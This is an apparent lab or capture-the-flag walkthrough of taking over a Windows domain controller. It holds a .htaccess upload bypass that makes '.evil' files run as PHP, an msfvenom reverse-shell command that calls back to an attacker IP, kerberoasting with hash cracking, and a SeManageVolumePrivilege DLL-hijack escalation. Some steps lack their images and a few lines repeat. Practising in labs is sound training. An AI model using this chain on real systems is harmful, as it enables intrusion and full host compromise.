Access
Seems to be a domain controller with the ports open 
80
Website present
There is an upload on the website:
We also have an upload directory: 
Now we can modify the .htaccess
To create new .htaccess file:
echo "AddType application/x-httpd-php .evil" > .htaccessNow uploading it. We can access it at http://192.168.218.187/uploads/shell.evil:
Then generating a msfvenom payload:
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exeNow we can execute it after transfering to get a shell: 
Might be possible but the process is most likely running as svc_apache.

Nope

Now using kerberoasting we got the hash:

Now cracking it: 
Now to get a shell as svc_mssql:
We have SeManageVolumePrivilege: 
Now we can use an exploit: https://github.com/CsEnox/SeManageVolumeExploit/releases Run it first
For Printconfig.dll:
Then transfer to machine Then copy it:
Then in powershell:
Now should have got a shell 
Run it first
For Printconfig.dll:
Then transfer to machine Then copy it:
Last updated
Was this helpful?